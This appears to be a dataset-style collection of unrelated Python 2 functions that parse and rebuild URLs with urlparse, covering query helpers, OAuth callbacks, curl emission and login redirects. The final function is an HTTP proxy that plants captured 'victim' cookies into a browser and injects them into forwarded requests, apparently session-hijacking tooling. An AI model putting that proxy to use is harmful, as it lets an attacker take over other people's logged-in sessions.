def mangle_url(orig_url, url): try: endpoint_url = urlparse.urlparse(url) except Exception as e: utils.unknown("you must provide an endpoint_url in the form" + "<scheme>://<url>/ (%s)\n" % e) scheme = endpoint_url.scheme if scheme is None: utils.unknown("you must provide an endpoint_url in the form" + "<scheme>://<url>/ (%s)\n" % e) catalog_url = urlparse.urlparse(orig_url) port = endpoint_url.port if port is None: if catalog_url.port is None: port = DAEMON_DEFAULT_PORT else: port = catalog_url.port netloc = "%s:%i" % (endpoint_url.hostname, port) url = urlparse.urlunparse([scheme, netloc, catalog_url.path, catalog_url.params, catalog_url.query, catalog_url.fragment]) return url
def url_add_parameters(url, params): """Adds parameters to URL, parameter will be repeated if already present""" if params: fragments = list(urlparse.urlparse(url)) fragments[4] = urllib.urlencode(parse_qsl(fragments[4]) + params.items()) url = urlparse.urlunparse(fragments) return url
def add_url_params(url, params): url_parts = list(theurlparse(url)) query = dict(parse_qsl(url_parts[4])) query.update(params) url_parts[4] = urlencode(query) return theurlparse.urlunparse(url_parts)
def make_job_desc_url(self, job_post_id): url_parts = list(urlparse.urlparse(self.url)) query = dict(urlparse.parse_qsl(url_parts[4])) query.update({'postid': job_post_id}) url_parts[4] = urlencode(query) return urlparse.urlunparse(url_parts)
def get_url_path(self): if hasattr(self.get_url, "dont_recurse"): raise NotImplementedError try: url = self.get_url() except NotImplementedError: raise bits = urlparse.urlparse(url) return urlparse.urlunparse(("", "") + bits[2:])
def build_ics_urls(ics_url): google_calendar_url_base = 'http://www.google.com/calendar/render?cid=' # Parse the URL into [scheme, netloc, path, params, query, fragment] parsed_ics_url = list(urlparse.urlparse(ics_url)) if parsed_ics_url[0] != 'https': parsed_ics_url[0] = 'http' ics_url_http = urlparse.urlunparse(parsed_ics_url) parsed_ics_url[0] = 'webcal' ics_url_webcal = urlparse.urlunparse(parsed_ics_url) parsed_google_url = list(urlparse.urlparse(google_calendar_url_base)) parsed_google_url[4] = dict(urlparse.parse_qsl(parsed_google_url[4])) parsed_google_url[4]['cid'] = ics_url_webcal parsed_google_url[4] = urllib.urlencode(parsed_google_url[4]) ics_url_google = urlparse.urlunparse(parsed_google_url) return ics_url_http, ics_url_webcal, ics_url_google
def change_get_args(url, func): """ func: a callback receives old query dictionary,\ return new query dictionary """ url_parts = list(urlparse.urlparse(url)) query = urlparse.parse_qs(url_parts[4]) query = func(query) query = encode_query_dict(query) url_parts[4] = urllib.urlencode(query, doseq=True) return urlparse.urlunparse(url_parts)
def get_callback_url(self): if self.callback and self.verifier: # Append the oauth_verifier. parts = urlparse.urlparse(self.callback) scheme, netloc, path, params, query, fragment = parts[:6] if query: query = '%s&oauth_verifier=%s' % (query, self.verifier) else: query = 'oauth_verifier=%s' % self.verifier return urlparse.urlunparse((scheme, netloc, path, params, query, fragment)) return self.callback
def add_url_params(url, new_params, concat=True, unique=True): if isinstance(new_params, dict): new_params = [(k, v) for k, v in new_params.iteritems()] url_parts = list(urlparse.urlparse(url)) params = urlparse.parse_qsl(url_parts[4]) params = new_params if not concat else params + new_params if unique: params = dict(params) url_parts[4] = urllib.urlencode(params) return urlparse.urlunparse(url_parts)
def emit_curl(self): cmdp = {} cmdp['user_token'] = '' auth = self.get_auth() if auth is not None: cmdp['user_token'] = '-u "%s:%s"' % (auth.username, auth.password) cmdp['content_type'] = '' if self.content_type is not None: cmdp['content_type'] = '-H "Content-Type: %s"' % self.content_type cmdp['method'] = "-X %s" % self.method url_parts = list(urlparse.urlparse(self.get_url())) if self.params is not None: url_parts[4] = urlencode(self.params) cmdp['url'] = '"%s"' % urlparse.urlunparse(url_parts) cmdp['data'] = "" if self.data is not None: cmdp['data'] = '--data "%s"' % urlencode(self.data) cmd = "curl {method} {content_type} {user_token} {url} {data}" return cmd.format(**cmdp).strip()
def _retry_using_form_auth(self, response, args): adapter = requests.adapters.HTTPAdapter() request = _copy_request(response.request) u = urlparse.urlparse(response.url) url = urlparse.urlunparse([u.scheme, u.netloc, '/login', None, None, None]) auth = {'username': self.username, 'password': self.password} request2 = requests.Request('POST', url, data=auth).prepare() response2 = adapter.send(request2, **args) if response2.status_code == 401: self.log.error('Login failed: Invalid username or password?') return response cookie = response2.headers.get('set-cookie') if cookie is not None: request.headers['Cookie'] = cookie response3 = adapter.send(request, **args) return response3
def render_GET(self, request): if request.args.get("logout"): self.deleteCookie(request, "user") a = authgate(request, config.AUTHGATEDOMAIN) try: ticket = a.login_required(accepting=lambda x: True) except a.redirect_exception as e: pass else: # only used for informational purposes, the backend stores this seperately # so if the user changes it just their front end will be messed up! request.addCookie("user", ticket.username, path="/") qt = ticket.get("qticket") if qt is not None: getSessionData(request)["qticket"] = decodeQTicket(qt) self.__hit() if request.getCookie("jslogin"): self.deleteCookie(request, "jslogin") return """<html><head><script>window.opener.__qwebircAuthCallback(%s);</script></head></html>""" % json.dumps( ticket.username) location = request.getCookie("redirect") if location is None: location = "/" else: self.deleteCookie(request, "redirect") _, _, path, params, query, _ = urlparse.urlparse( urllib.unquote(location)) location = urlparse.urlunparse( ("", "", path, params, query, "")) request.redirect(location) request.finish() return server.NOT_DONE_YET
def mangle_url(self, url): # This first connection populate the structure we need inside # the object. This does not cost anything if a connection has # already been made. self.check_connection() try: endpoint_url = urlparse.urlparse(url) except Exception as e: utils.unknown("you must provide an endpoint_url in the form" + "<scheme>://<url>/ (%s)" % e) scheme = endpoint_url.scheme if scheme is None: utils.unknown("you must provide an endpoint_url in the form" + "<scheme>://<url>/ (%s)" % e) catalog_url = None try: catalog_url = urlparse.urlparse( self.nova_client.client.management_url) except Exception as e: utils.unknown("unknown error parsing the catalog url : %s" % e) port = endpoint_url.port if port is None: if catalog_url.port is None: port = self.DAEMON_DEFAULT_PORT else: port = catalog_url.port netloc = "%s:%i" % (endpoint_url.hostname, port) url = urlparse.urlunparse([scheme, netloc, catalog_url.path, catalog_url.params, catalog_url.query, catalog_url.fragment]) self.nova_client.client.management_url = url
def make_relative(self, value): """Converst URL to relative, useful for server responses""" parsed = urlparse.urlparse(value) return urlparse.urlunparse(('', '', parsed.path, parsed.params, parsed.query, parsed.fragment))
def add_parameters(self, url, params): ps = list(urlparse.urlparse(url)) ps[4] = urlencode(params) return urlparse.urlunparse(ps)
def do_GET(self): global cookiejar global victimheaders global ate (scm, netloc, path, params, query, fragment) = urlparse.urlparse( self.path, 'http') if scm != 'http' or fragment or not netloc: self.send_error(400, "bad url %s" % html.escape(self.path)) return soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: (ip, port) = self.client_address cookiehosts = cookiejar.keys() if (netloc == 'setcookies' or not ate.cookies): self.log.debug('time to set some cookies') if len(cookiehosts) > 0: self.log.debug('no cookies to set') if netloc in cookiehosts: newcookie = cookiejar[netloc] headers=''.join(map(lambda x: 'Set-cookie: %s;\r\n' % x, newcookie.split(';'))) nextpos = cookiehosts.index(netloc)+1 print('setting cookie for %s' % netloc) if nextpos >= len(cookiehosts): body = "<h1> all cookies set</h1>" ate.cookies = True #cookiejar.clear() body += ''.join(map(lambda x: "<a href='http://%s/'>%s</a>\r\n<br />" % (urllib.quote(x),cgi.escape(x)),cookiehosts)) body += "go to http://setcookies to set new cookies later on" else: nextdestination = cookiehosts[nextpos] body = '<meta http-equiv="refresh" content="0;url=http://%s"/>' % urllib.quote(nextdestination) else: headers = '' body = '<meta http-equiv="refresh" content="0;url=http://%s"/>taking you somewhere' % urllib.quote(cookiehosts[0]) else: headers = '' body = '<h1>no cookies to set</h1> go to http://setcookies to set cookies later on' self.log.debug( self.setcookiepkt % (len(body),headers,body)) self.wfile.write(self.setcookiepkt % (len(body),headers,body)) else: if self._connect_to(netloc, soc): self.log_request() soc.send("%s %s %s\r\n" % ( self.command, urlparse.urlunparse(('', '', path, params, query, '')), self.request_version)) #for header in victimheaders.keys(): #self.headers[header] = victimheaders[header][0] self.headers['Connection'] = 'close' del self.headers['Proxy-Connection'] if netloc in cookiejar.keys(): self.headers['Cookie'] = cookiejar[netloc] for key_val in self.headers.items(): soc.send("%s: %s\r\n" % key_val) soc.send("\r\n") self._read_write(soc) finally: self.log.debug( "\t bye") soc.close() self.connection.close()